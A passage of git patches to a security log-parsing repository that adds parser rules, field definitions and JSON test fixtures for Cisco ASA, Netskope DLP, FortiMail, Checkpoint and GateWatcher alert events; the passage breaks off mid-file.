index 000000000..89a45ce75
--- /dev/null
+++ b/Cisco/cisco-secure-firewall/tests/test_ASA_113012.json
@@ -0,0 +1,33 @@
+{
+  "input": {
+    "message": "%ASA-6-113012: AAA user authentication Successful : local database : user = admintufin"
+  },
+  "expected": {
+    "message": "%ASA-6-113012: AAA user authentication Successful : local database : user = admintufin",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "code": "113012",
+      "outcome": "success",
+      "type": [
+        "start"
+      ]
+    },
+    "action": {
+      "target": "network-traffic"
+    },
+    "observer": {
+      "product": "Adaptive Security Appliance",
+      "vendor": "Cisco"
+    },
+    "related": {
+      "user": [
+        "admintufin"
+      ]
+    },
+    "user": {
+      "name": "admintufin"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Cisco/cisco-secure-firewall/tests/test_ASA_611101.json b/Cisco/cisco-secure-firewall/tests/test_ASA_611101.json
new file mode 100644
index 000000000..e7a7eae6f
--- /dev/null
+++ b/Cisco/cisco-secure-firewall/tests/test_ASA_611101.json
@@ -0,0 +1,41 @@
+{
+  "input": {
+    "message": "%ASA-6-611101: User authentication succeeded: IP address: 0.0.0.0, Uname: admintufin"
+  },
+  "expected": {
+    "message": "%ASA-6-611101: User authentication succeeded: IP address: 0.0.0.0, Uname: admintufin",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "code": "611101",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "action": {
+      "name": "succeeded",
+      "target": "network-traffic"
+    },
+    "observer": {
+      "product": "Adaptive Security Appliance",
+      "vendor": "Cisco"
+    },
+    "related": {
+      "ip": [
+        "0.0.0.0"
+      ],
+      "user": [
+        "admintufin"
+      ]
+    },
+    "source": {
+      "address": "0.0.0.0",
+      "ip": "0.0.0.0"
+    },
+    "user": {
+      "name": "admintufin"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Cisco/cisco-secure-firewall/tests/test_ASA_611103.json b/Cisco/cisco-secure-firewall/tests/test_ASA_611103.json
new file mode 100644
index 000000000..6e39d0856
--- /dev/null
+++ b/Cisco/cisco-secure-firewall/tests/test_ASA_611103.json
@@ -0,0 +1,34 @@
+{
+  "input": {
+    "message": "%ASA-5-611103: User logged out: Uname: admintufin"
+  },
+  "expected": {
+    "message": "%ASA-5-611103: User logged out: Uname: admintufin",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "code": "611103",
+      "outcome": "success",
+      "type": [
+        "end"
+      ]
+    },
+    "action": {
+      "name": "logged out",
+      "target": "network-traffic"
+    },
+    "observer": {
+      "product": "Adaptive Security Appliance",
+      "vendor": "Cisco"
+    },
+    "related": {
+      "user": [
+        "admintufin"
+      ]
+    },
+    "user": {
+      "name": "admintufin"
+    }
+  }
+}
\ No newline at end of file

From 5a53c623a6c3bdfd95535a83657a18887d1887e1 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Thu, 12 Sep 2024 09:59:00 +0300
Subject: [PATCH 013/317] apply linter

---
 Cisco/cisco-secure-firewall/ingest/parser.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/Cisco/cisco-secure-firewall/ingest/parser.yml b/Cisco/cisco-secure-firewall/ingest/parser.yml
index a89263732..04ce99510 100644
--- a/Cisco/cisco-secure-firewall/ingest/parser.yml
+++ b/Cisco/cisco-secure-firewall/ingest/parser.yml
@@ -399,13 +399,13 @@ stages:
           event.outcome: "success"
         filter: '{{pre_parsing.pre_message.message_number_grok in ["113004", "113012"]}}'
       - set:
-          event.category: [ "authentication" ]
-          event.type: [ "info" ]
+          event.category: ["authentication"]
+          event.type: ["info"]
           event.outcome: "success"
         filter: '{{pre_parsing.pre_message.message_number_grok in ["611101"]}}'
       - set:
-          event.category: [ "authentication" ]
-          event.type: [ "end" ]
+          event.category: ["authentication"]
+          event.type: ["end"]
           event.outcome: "success"
         filter: '{{pre_parsing.pre_message.message_number_grok in ["611103"]}}'
       - set:

From 81a9ef4b5f12c05ea0d9911fe690a0dec9c51d65 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Thu, 12 Sep 2024 10:06:08 +0300
Subject: [PATCH 014/317] Add smart description

---
 .../_meta/smart-descriptions.json             | 47 +++++++++++++++++++
 1 file changed, 47 insertions(+)

diff --git a/Cisco/cisco-secure-firewall/_meta/smart-descriptions.json b/Cisco/cisco-secure-firewall/_meta/smart-descriptions.json
index d8089521b..8682bb293 100644
--- a/Cisco/cisco-secure-firewall/_meta/smart-descriptions.json
+++ b/Cisco/cisco-secure-firewall/_meta/smart-descriptions.json
@@ -172,6 +172,53 @@
       }
     ]
   },
+  {
+    "value": "User {user.name} logged out",
+    "conditions": [
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "event.category",
+        "value": "authentication"
+      },
+      {
+        "field": "event.type",
+        "value": "end"
+      }
+    ]
+  },
+  {
+    "value": "User {user.name} logged in",
+    "conditions": [
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "event.category",
+        "value": "authentication"
+      },
+      {
+        "field": "event.type",
+        "value": "start"
+      }
+    ]
+  },
+  {
+    "value": "User {user.name} authentication: {action.name}",
+    "conditions": [
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "action.name"
+      },
+      {
+        "field": "event.category",
+        "value": "authentication"
+      }
+    ]
+  },
   {
     "value": "User {user.name}: {event.reason}",
     "conditions": [

From 299f49c60a6a34903e428554ffdf731fed218c41 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 12 Sep 2024 17:37:45 +0200
Subject: [PATCH 015/317] Fix on Netskope: Addition of dlp fields

---
 Netskope/netskope_events/_meta/fields.yml     | 25 +++++++++++++++++++
 Netskope/netskope_events/ingest/parser.yml    | 22 ++++++++++++++++
 .../tests/test_dlp_incident.json              | 19 +++++++++++++-
 3 files changed, 65 insertions(+), 1 deletion(-)

diff --git a/Netskope/netskope_events/_meta/fields.yml b/Netskope/netskope_events/_meta/fields.yml
index 57217bd9f..18c1fab3f 100644
--- a/Netskope/netskope_events/_meta/fields.yml
+++ b/Netskope/netskope_events/_meta/fields.yml
@@ -8,6 +8,16 @@ netskope.alerts.type:
   name: netskope.alerts.type
   type: keyword
 
+netskope.dlp.action:
+  description: The action done on the DLP incident
+  name: netskope.dlp.action
+  type: keyword
+
+netskope.dlp.forensic_id:
+  description: The identifier of the forensic
+  name: netskope.dlp.forensic_id
+  type: keyword
+
 netskope.dlp.incident.id:
   description: The identifier of the DLP incident
   name: netskope.dlp.incident.id
@@ -18,6 +28,21 @@ netskope.dlp.incident.parent_id:
   name: netskope.dlp.incident.parent_id
   type: keyword
 
+netskope.dlp.policy:
+  description: The policy that triggered the DLP incident
+  name: netskope.dlp.policy
+  type: keyword
+
+netskope.dlp.profile_name:
+  description: The name of the DLP profile
+  name: netskope.dlp.profile_name
+  type: keyword
+
+netskope.dlp.rules:
+  description: Rules that triggered the DLP incident
+  name: netskope.dlp.rules
+  type: array
+
 netskope.events.access_method:
   description: The action done on the application
   name: netskope.events.access_method
diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml
index d966ed9c5..471b39627 100644
--- a/Netskope/netskope_events/ingest/parser.yml
+++ b/Netskope/netskope_events/ingest/parser.yml
@@ -141,6 +141,28 @@ stages:
           netskope.events.ccl: "{{parsed_event.message.ccl}}"
           netskope.events.severity.id: "{{parsed_event.message.severity_id}}"
           netskope.events.severity.level: "{{parsed_event.message.severity_level}}"
+      - set:
+          netskope.dlp.action: "{{parsed_event.message.dlp_match_info[0].dlp_action}}"
+          netskope.dlp.forensic_id: "{{parsed_event.message.dlp_match_info[0].dlp_forensic_id}}"
+          netskope.dlp.policy: "{{parsed_event.message.dlp_match_info[0].dlp_policy}}"
+          netskope.dlp.profile_name: "{{parsed_event.message.dlp_match_info[0].dlp_profile_name}}"
+        filter: "{{parsed_event.message.dlp_match_info[0] != None}}"
+
+      - set:
+          netskope.dlp.rules: >
+            {%- set rules = [] -%}
+            {%- for rule in parsed_event.message.dlp_match_info[0].dlp_rules -%}
+            {%- set _ = rules.append({
+              "name": rule.dlp_rule_name,
+              "score": rule.dlp_rule_score,
+              "severity": rule.dlp_rule_severity,
+              "count": rule.dlp_incident_rule_count,
+              "unique_count": rule.is_unique_count,
+              "data_identifiers": rule.dlp_data_identifiers
+            }) -%}
+            {%- endfor -%}
+            {{rules}}
+        filter: "{{parsed_event.message.dlp_match_info[0] != None and parsed_event.message.dlp_match_info[0].dlp_rules != None}}"
       - set:
           netskope.dlp.incident.id: "{{parsed_event.message.dlp_incident_id}}"
         filter: "{{parsed_event.message.dlp_incident_id not in [None, 0]}}"
diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json
index 103d1cb37..66c901c90 100644
--- a/Netskope/netskope_events/tests/test_dlp_incident.json
+++ b/Netskope/netskope_events/tests/test_dlp_incident.json
@@ -39,9 +39,26 @@
     },
     "netskope": {
       "dlp": {
+        "action": "useralert",
+        "forensic_id": "2222222222222222222",
         "incident": {
           "id": "2222222222222222222"
-        }
+        },
+        "policy": "[DLP] Block sensitive files on Cloud Storage",
+        "profile_name": "DLP-PII",
+        "rules": [
+          {
+            "count": 5,
+            "data_identifiers": {
+              "industries/healthcare/medical_conditions/eng": 5,
+              "persons/proper_names/us/last": 5
+            },
+            "name": "Name-Medical Condition",
+            "score": 10,
+            "severity": "Low",
+            "unique_count": false
+          }
+        ]
       },
       "events": {
         "access_method": "Client",

From f53590fa1925f5ee6a9270e32df5a7fc1eec34e6 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 12 Sep 2024 17:43:05 +0200
Subject: [PATCH 016/317] Added generic smartdesc for dlp events

---
 .../netskope_events/_meta/smart-descriptions.json    | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/Netskope/netskope_events/_meta/smart-descriptions.json b/Netskope/netskope_events/_meta/smart-descriptions.json
index 14c92d9e3..bdc92b317 100644
--- a/Netskope/netskope_events/_meta/smart-descriptions.json
+++ b/Netskope/netskope_events/_meta/smart-descriptions.json
@@ -202,5 +202,17 @@
         "type": "connected to"
       }
     ]
+  },
+  {
+    "value": "DLP incident detected: {netskope.dlp.policy}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "dlp_incident"
+      },
+      {
+        "field": "netskope.dlp.policy"
+      }
+    ]
   }
 ]

From 383ccab5663c7d08e47ae94ba61123023f8f4e5c Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Fri, 13 Sep 2024 12:38:21 +0300
Subject: [PATCH 017/317] Remove short message parsing

---
 Fortinet/fortimail/ingest/parser.yml      | 26 ------------
 Fortinet/fortimail/tests/short_event.json | 51 -----------------------
 2 files changed, 77 deletions(-)
 delete mode 100644 Fortinet/fortimail/tests/short_event.json

diff --git a/Fortinet/fortimail/ingest/parser.yml b/Fortinet/fortimail/ingest/parser.yml
index 09a3fbb8b..f57bd8dcd 100644
--- a/Fortinet/fortimail/ingest/parser.yml
+++ b/Fortinet/fortimail/ingest/parser.yml
@@ -7,17 +7,6 @@ pipeline:
       properties:
         input_field: "{{original.message}}"
 
-  - name: parse_short_event
-    external:
-      name: grok.match
-      properties:
-        input_field: original.message
-        output_field: msg
-        pattern: "to=%{DATA:email_to}%{DELIM}(delay=%{DATA:tmp_delay}%{DELIM})?(xdelay=%{DATA:tmp_xdelay}%{DELIM})?(mailer=%{DATA:tmp_mailer}%{DELIM})?(pri=%{NUMBER:tmp_priority_level_msg}%{DELIM})?(relay=%{RELAY_INFO:relay}%{DELIM})?(dsn=%{DATA:tmp_dsn_version}%{DELIM})?stat=%{GREEDYDATA:event_reason}"
-        custom_patterns:
-          DELIM: ', |\s'
-          RELAY_INFO: '(%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\])|(\[%{IP:_destination_ip}\] \[%{IP:_destination_ip2}\])'
-
   - name: parsed_msg
     external:
       name: grok.match
@@ -178,21 +167,6 @@ stages:
           action.properties.virus: "{{parsed_event.message.virus}}"
           action.properties.xdelay: "{{parse_stat_message.msg.tmp_xdelay or parse_event_with_no_stat.msg.xdelay }}"
 
-      - set:
-          event.reason: "{{parse_short_event.msg.event_reason}}"
-          email.to.address: "{{parse_short_event.msg.email_to.replace('<', '').replace('>', '')}}"
-          user.email: "{{parse_short_event.msg.email_to.replace('<', '').replace('>', '')}}"
-          action.properties.delay: "{{parse_short_event.msg.tmp_delay}}"
-          action.properties.xdelay: "{{parse_short_event.msg.tmp_xdelay}}"
-          action.properties.mailer: "{{parse_short_event.msg.tmp_mailer}}"
-          action.properties.priority_level_msg: "{{parse_short_event.msg.tmp_priority_level_msg}}"
-          action.properties.relay: "{{parse_short_event.msg._destination_ip}}"
-          action.properties.dsn_version: "{{parse_short_event.msg.tmp_dsn_version}}"
-          destination.domain: "{{parse_short_event.msg.destination_domain}}"
-          destination.address: "{{parse_short_event.msg.destination_domain}}"
-          destination.ip: "{{parse_short_event.msg._destination_ip}}"
-        filter: "{{parse_short_event.get('msg') != None}}"
-
       - set:
           action.properties.relay: >
             {%- if parse_relay_data.msg.destination_domain | length > 0 -%}{{parse_relay_data.msg.destination_domain}}{%- elif parse_relay_data.msg._destination_ip | length > 0-%}{{parse_relay_data.msg._destination_ip}}{%- endif -%}
diff --git a/Fortinet/fortimail/tests/short_event.json b/Fortinet/fortimail/tests/short_event.json
deleted file mode 100644
index c44f8b41d..000000000
--- a/Fortinet/fortimail/tests/short_event.json
+++ /dev/null
@@ -1,51 +0,0 @@
-{
-  "input": {
-    "message": "to=<john.doe@example.com>, delay=00:00:00, xdelay=00:00:00, mailer=esmtp, pri=138084, relay=[1.2.3.4] [1.2.3.4], dsn=2.0.0, stat=Sent (<contact@example.com> [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)",
-    "event": {
-      "created": "2021-04-23T20:02:05.017771Z",
-      "id": "123"
-    },
-    "log": {
-      "hostname": "abc"
-    }
-  },
-  "expected": {
-    "message": "to=<john.doe@example.com>, delay=00:00:00, xdelay=00:00:00, mailer=esmtp, pri=138084, relay=[1.2.3.4] [1.2.3.4], dsn=2.0.0, stat=Sent (<contact@example.com> [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)",
-    "event": {
-      "reason": "Sent (<contact@example.com> [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)"
-    },
-    "action": {
-      "properties": {
-        "delay": "00:00:00",
-        "dsn_version": "2.0.0",
-        "mailer": "esmtp",
-        "priority_level_msg": "138084",
-        "relay": "1.2.3.4",
-        "xdelay": "00:00:00"
-      }
-    },
-    "destination": {
-      "address": "1.2.3.4",
-      "ip": "1.2.3.4"
-    },
-    "email": {
-      "to": {
-        "address": [
-          "john.doe@example.com,"
-        ]
-      }
-    },
-    "log": {
-      "hostname": "abc",
-      "level": "138084,"
-    },
-    "related": {
-      "ip": [
-        "1.2.3.4"
-      ]
-    },
-    "user": {
-      "email": "john.doe@example.com"
-    }
-  }
-}
\ No newline at end of file

From 6e0b80f38060072307ce3bc07b76b831a9f5564c Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Fri, 13 Sep 2024 12:38:50 +0300
Subject: [PATCH 018/317] Remove short message parsing

---
 Fortinet/fortimail/tests/esmtp.json | 22 +---------------------
 1 file changed, 1 insertion(+), 21 deletions(-)

diff --git a/Fortinet/fortimail/tests/esmtp.json b/Fortinet/fortimail/tests/esmtp.json
index a6e28d8a2..67195bfb3 100644
--- a/Fortinet/fortimail/tests/esmtp.json
+++ b/Fortinet/fortimail/tests/esmtp.json
@@ -4,23 +4,11 @@
   },
   "expected": {
     "message": "to=<jdoe@example.com> delay=00:00:06 xdelay=00:00:06 mailer=esmtp pri=165917 relay= [3.4.5.6] dsn=2.0.0 stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)",
-    "event": {
-      "reason": "Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)"
-    },
     "action": {
       "properties": {
-        "delay": "00:00:06",
-        "dsn_version": "2.0.0",
-        "mailer": "esmtp",
-        "priority_level_msg": "165917",
-        "relay": "3.4.5.6",
-        "xdelay": "00:00:06"
+        "mailer": "esmtp"
       }
     },
-    "destination": {
-      "address": "3.4.5.6",
-      "ip": "3.4.5.6"
-    },
     "email": {
       "to": {
         "address": [
@@ -30,14 +18,6 @@
     },
     "log": {
       "level": "165917"
-    },
-    "related": {
-      "ip": [
-        "3.4.5.6"
-      ]
-    },
-    "user": {
-      "email": "jdoe@example.com"
     }
   }
 }
\ No newline at end of file

From 4d0a65fc072fddae51fff55d9439b4e380b29348 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Fri, 13 Sep 2024 12:58:40 +0300
Subject: [PATCH 019/317] Fix review comments

---
 Checkpoint/checkpoint/_meta/fields.yml      | 4 ++--
 Checkpoint/checkpoint/ingest/parser.yml     | 2 +-
 Checkpoint/checkpoint/tests/CEF_drop_1.json | 8 +++++---
 3 files changed, 8 insertions(+), 6 deletions(-)

diff --git a/Checkpoint/checkpoint/_meta/fields.yml b/Checkpoint/checkpoint/_meta/fields.yml
index 8c5d0787a..7047bcfd4 100644
--- a/Checkpoint/checkpoint/_meta/fields.yml
+++ b/Checkpoint/checkpoint/_meta/fields.yml
@@ -143,9 +143,9 @@ action.target:
   name: action.target
   type: keyword
 
-action.tcp.flag:
+checkpoint.firewall.tcp_flags:
   description: The control flag of the data flow
-  name: action.tcp.flag
+  name: checkpoint.firewall.tcp_flags
   type: keyword
 
 destination.size_in_char:
diff --git a/Checkpoint/checkpoint/ingest/parser.yml b/Checkpoint/checkpoint/ingest/parser.yml
index 36ba7d7bb..10a545336 100644
--- a/Checkpoint/checkpoint/ingest/parser.yml
+++ b/Checkpoint/checkpoint/ingest/parser.yml
@@ -168,7 +168,7 @@ stages:
           url.full: "{{checkpoint.message.request}}"
           url.original: "{{checkpoint.message.request}}"
           user_agent.original: "{{checkpoint.message.user_agent}}"
-          action.tcp.flag: "{{checkpoint.message.get('TCP Flags')}}"
+          checkpoint.firewall.tcp_flags: "{{checkpoint.message.get('TCP Flags')}}"
 
       - translate:
         dictionary:
diff --git a/Checkpoint/checkpoint/tests/CEF_drop_1.json b/Checkpoint/checkpoint/tests/CEF_drop_1.json
index 0695322fa..b20e06518 100644
--- a/Checkpoint/checkpoint/tests/CEF_drop_1.json
+++ b/Checkpoint/checkpoint/tests/CEF_drop_1.json
@@ -18,9 +18,11 @@
         "originsicname": "CN=cip-fw-test-1,O=CPSRVP.test.test",
         "product": "VPN-1 & FireWall-1"
       },
-      "target": "network-traffic",
-      "tcp": {
-        "flag": "SYN-ACK"
+      "target": "network-traffic"
+    },
+    "checkpoint": {
+      "firewall": {
+        "tcp_flags": "SYN-ACK"
       }
     },
     "destination": {

From a3d2ce0f11a5c43f968a32a149c6dcf1bc2a22f2 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Fri, 13 Sep 2024 14:16:50 +0200
Subject: [PATCH 020/317] Correcting fields name

---
 GateWatcher/aioniq/_meta/fields.yml  | 6 +++---
 GateWatcher/aioniq/ingest/parser.yml | 2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index d34cd4696..666611c6d 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -320,9 +320,9 @@ gatewatcher.smb:
   name: gatewatcher.smb
   type: text
 
-gatewatcher.smtp_email:
-  description: This field is used for smtp alerts
-  name: gatewatcher.smtp_email
+gatewatcher.email:
+  description: This field represents the email field
+  name: gatewatcher.email
   type: text
 
 gatewatcher.snmp:
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 58f96e058..894264d2b 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -166,7 +166,7 @@ stages:
           http.request.method: '{{json_load.message.http.http_method}}'
           user_agent.original: '{{json_load.message.http.http_user_agent}}'
           gatewatcher.ftp_data: '{{json_load.message.ftp_data}}'
-          gatewatcher.smtp_email: '{{json_load.message.email}}'
+          gatewatcher.email: '{{json_load.message.email}}'
           http.response.status_code: '{{json_load.message.http.status}}'
         filter: ''
         name: set

From 1a06dd2262f249ddca20aa7aab586cd169971174 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Fri, 13 Sep 2024 15:29:56 +0200
Subject: [PATCH 021/317] New tests and new gatewatcher.smtp field

---
 GateWatcher/aioniq/_meta/fields.yml         |   6 ++
 GateWatcher/aioniq/tests/codebreaker.json   |  14 +++
 GateWatcher/aioniq/tests/dga.json           |  14 +++
 GateWatcher/aioniq/tests/malcore.json       |  14 +++
 GateWatcher/aioniq/tests/malcore_event.json | 105 --------------------
 GateWatcher/aioniq/tests/retrohunt.json     |  14 +++
 GateWatcher/aioniq/tests/sigflow-alert.json |  14 +++
 GateWatcher/aioniq/tests/sigflow-file.json  |  14 +++
 GateWatcher/aioniq/tests/sigflow-meta.json  |  14 +++
 9 files changed, 104 insertions(+), 105 deletions(-)
 create mode 100644 GateWatcher/aioniq/tests/codebreaker.json
 create mode 100644 GateWatcher/aioniq/tests/dga.json
 create mode 100644 GateWatcher/aioniq/tests/malcore.json
 delete mode 100644 GateWatcher/aioniq/tests/malcore_event.json
 create mode 100644 GateWatcher/aioniq/tests/retrohunt.json
 create mode 100644 GateWatcher/aioniq/tests/sigflow-alert.json
 create mode 100644 GateWatcher/aioniq/tests/sigflow-file.json
 create mode 100644 GateWatcher/aioniq/tests/sigflow-meta.json

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index 666611c6d..60ddda7ad 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -325,6 +325,12 @@ gatewatcher.email:
   name: gatewatcher.email
   type: text
 
+gatewatcher.smtp:
+  description: This field represents the smtp field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.smtp
+  type: text
+
 gatewatcher.snmp:
   description: This field represents the snmp field in a network metadata (used in
     legacy format log)
diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json
new file mode 100644
index 000000000..606433e7e
--- /dev/null
+++ b/GateWatcher/aioniq/tests/codebreaker.json
@@ -0,0 +1,14 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ",
+        "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
+      }
+    },
+    "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}"
+  },
+  "expected": {
+    "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}"
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json
new file mode 100644
index 000000000..5303e1bb5
--- /dev/null
+++ b/GateWatcher/aioniq/tests/dga.json
@@ -0,0 +1,14 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ",
+        "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
+      }
+    },
+    "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}"
+  },
+  "expected": {
+    "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}"
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json
new file mode 100644
index 000000000..7a6dc8130
--- /dev/null
+++ b/GateWatcher/aioniq/tests/malcore.json
@@ -0,0 +1,14 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ",
+        "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
+      }
+    },
